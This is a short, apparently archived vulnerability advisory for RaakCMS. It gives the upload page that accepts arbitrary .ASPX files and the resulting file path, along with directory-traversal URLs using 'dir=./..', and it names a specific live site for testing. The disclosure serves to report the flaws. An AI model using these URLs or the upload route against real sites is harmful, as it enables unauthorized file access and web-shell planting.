RoakCMS Shell Upload / Directory Traversal

2010-01-31T00:00:00
ID PACKETSTORM:85790
Type packetstorm
Reporter Pouya Daneshmand
Modified 2010-01-31T00:00:00

Description

                                        
                                            `#################################################################  
# Securitylab.ir  
#################################################################  
# Application Info:  
# Name: RaakCms  
# Vendor: http://raakcms.com  
#################################################################  
Vulnerability:  
=======================  
Arbitrary File Upload  
=======================  
http://site.ir/webmaster/pic.aspx  
select file and folder , your file upload here:  
http://site.ir/User_Images/[Folder]/FILE.ASPX  
  
=======================  
Directory Traversal  
=======================  
http://site.ir/browse.asp?dir=./..  
http://site.ir/browseFile.asp?dir=./..  
#################################################################  
Live test: http://behzisty-kj.ir  
#################################################################  
# Discoverd By: Pouya Daneshmand  
# Website: http://securitylab.ir  
# Contacts: info[at]securitylab.ir & whh_iran@yahoo.com  
###################################################################  
  
  
  
`